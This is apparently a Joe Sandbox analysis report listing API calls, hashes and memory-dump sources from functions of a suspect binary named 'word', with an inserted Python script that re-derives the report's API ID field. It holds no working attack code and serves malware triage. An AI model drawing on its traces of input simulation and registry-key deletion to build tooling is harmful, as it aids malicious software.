                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 4166825349-0
                                                                            • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                            • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                            • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                            • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00434134
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                            • API String ID: 2574300362-3261711971
                                                                            • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                            • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                            • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                            • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?,00000000,FFFFFFFF,00000000,?), ref: 00433724
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                            • GetClientRect.USER32(0000001D,?,00000000,FFFFFFFF,00000000,?), ref: 004337AC
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                            • GetWindowRect.USER32(?,?), ref: 00433814
                                                                            • ScreenToClient.USER32(?,?), ref: 00433842
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                            • String ID:
                                                                            • API String ID: 3220332590-0
                                                                            • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                            • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                            • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                            • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1612042205-0
                                                                            • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                            • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                            • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                            • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 2221674350-0
                                                                            • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                            • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                            • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                            • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2037614760-0
                                                                            • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                            • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                            • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                            • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                            APIs
                                                                            • BeginPaint.USER32(00000000,?), ref: 00447B9D
                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                            • String ID:
                                                                            • API String ID: 4189319755-0
                                                                            • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                            • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                            • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                            • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 1726766782-0
                                                                            • Opcode ID: 83222f4c63df7e997ce5feac3b83dd155efb879fc6a19bdc36499811ac613e1e
                                                                            • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                            • Opcode Fuzzy Hash: 83222f4c63df7e997ce5feac3b83dd155efb879fc6a19bdc36499811ac613e1e
                                                                            • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000000), ref: 004410F9
                                                                            • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                            • ShowWindow.USER32(?,00000000), ref: 00441183
                                                                            • ShowWindow.USER32(?,00000004), ref: 00441192
                                                                            • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                            • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                            • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                            • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00442597
                                                                              • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                            • GetDesktopWindow.USER32 ref: 004425BF
                                                                            • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                            • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                            • GetCursorPos.USER32(?), ref: 00442624
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                            • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                            • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                            • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 1871949834-0
                                                                            • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                            • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                            • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                            • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0044961A
                                                                            • SendMessageW.USER32 ref: 0044964A
                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                            • _wcslen.LIBCMT ref: 004496BA
                                                                            • _wcslen.LIBCMT ref: 004496C7
                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 1624073603-0
                                                                            • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                            • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                            • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                            • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
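                                                                            The "API ID" line in each Similarity block is not explained anywhere in the report, but it can be reconstructed from the "APIs" lists printed above: every API name (subcall lines and repeats included) is split into tokens, the tokens are grouped by how often they occur, the most frequent group comes first, each group is sorted in plain ASCII order, and the groups are joined with "$". The script below is an added example, not part of the Joe Sandbox report or of its tooling. It parses the API reference lines exactly as they are printed in this listing and re-derives the ID. The tokenisation rule (camel-case split, tokens of three characters or fewer such as Get/Set/End/Ex/Org/Pos/W dropped, names that do not start with an upper-case letter such as mouse_event, _wcslen and std::bad_alloc::bad_alloc kept whole) is inferred from the six fully listed functions on this page and is an assumption, not documented Joe Sandbox behaviour. The sample input is copied from the InterlockedExchange/ReadFile and mouse_event listings above.

```python
"""Re-derive the 'API ID' field of a Joe Sandbox function listing from its 'APIs' lines."""
import re
from collections import Counter

# One API reference line as printed in the report; covers the three shapes seen in the listing:
#   • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
#   • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
#   • GetForegroundWindow.USER32 ref: 00442597
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Sample input copied from the report listings (InterlockedExchange/ReadFile and mouse_event functions).
SAMPLE_READFILE = """
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
• EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
• LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
"""

SAMPLE_MOUSE = """
• GetForegroundWindow.USER32 ref: 00442597
  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
• GetDesktopWindow.USER32 ref: 004425BF
• GetWindowRect.USER32(00000000), ref: 004425C6
• mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• GetCursorPos.USER32(?), ref: 00442624
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
"""


def parse_api_lines(text):
    """Return one record per API reference line: api, module, args (list), ref (int), parent."""
    records = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue  # headings such as 'APIs' or 'Memory Dump Source' carry no reference
        args = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "parent": m.group("parent"),  # address of the subcall function, or None for a direct call
        })
    return records


CAMEL = re.compile(r"[A-Z][^A-Z]*")


def tokens_for(api):
    """Split an API name the way the report's API ID appears to (rule inferred here, an assumption):
    once leading underscores are ignored, a name that does not start with an upper-case letter
    (mouse_event, _wcslen, std::bad_alloc::bad_alloc) stays a single token; a camel-case name is
    split at upper-case letters and tokens of three characters or fewer (Get, Set, End, Ex, Org,
    Pos, W, Cxx) are dropped."""
    stripped = api.lstrip("_")
    if not stripped[:1].isupper():
        return [api]
    return [t for t in CAMEL.findall(stripped) if len(t) > 3]


def api_id(records):
    """Count tokens over all lines (subcalls and repeats included), group by count descending,
    sort each group in ASCII order and join the groups with '$'."""
    counts = Counter(t for r in records for t in tokens_for(r["api"]))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def api_id_from_listing(text):
    """Listing text in, API ID string out."""
    return api_id(parse_api_lines(text))


if __name__ == "__main__":
    for name, sample in (("ReadFile function", SAMPLE_READFILE), ("mouse_event function", SAMPLE_MOUSE)):
        recs = parse_api_lines(sample)
        print(name, "->", api_id(recs))
        for r in recs:
            call = "%s.%s" % (r["api"], r["module"])
            if r["args"]:
                call += "(" + ",".join(r["args"]) + ")"
            print("   %s%s @ %08X" % ("  " if r["parent"] else "", call, r["ref"]))
```

                                                                            Re-deriving the ID is a cheap consistency check when triaging: two functions with identical API IDs share the same multiset of call tokens whatever their addresses or fuzzy hashes, and a mismatch between a recomputed and a printed ID means the rule above does not cover a name form in that listing. The parsed argument lists are worth keeping as well: the first argument of both mouse_event calls, 00008001, is MOUSEEVENTF_ABSOLUTE (0x8000) combined with MOUSEEVENTF_MOVE (0x0001), so the function positions the cursor at absolute screen coordinates derived from GetWindowRect and GetCursorPos, which is what the report's "Sleep"/"mouse_event" pairing in that block describes.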
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                            • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                            • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                            • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                            • String ID:
                                                                            • API String ID: 1640429340-0
                                                                            • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                            • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                            • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                            • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                            • String ID:
                                                                            • API String ID: 3354276064-0
                                                                            • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                            • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                            • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
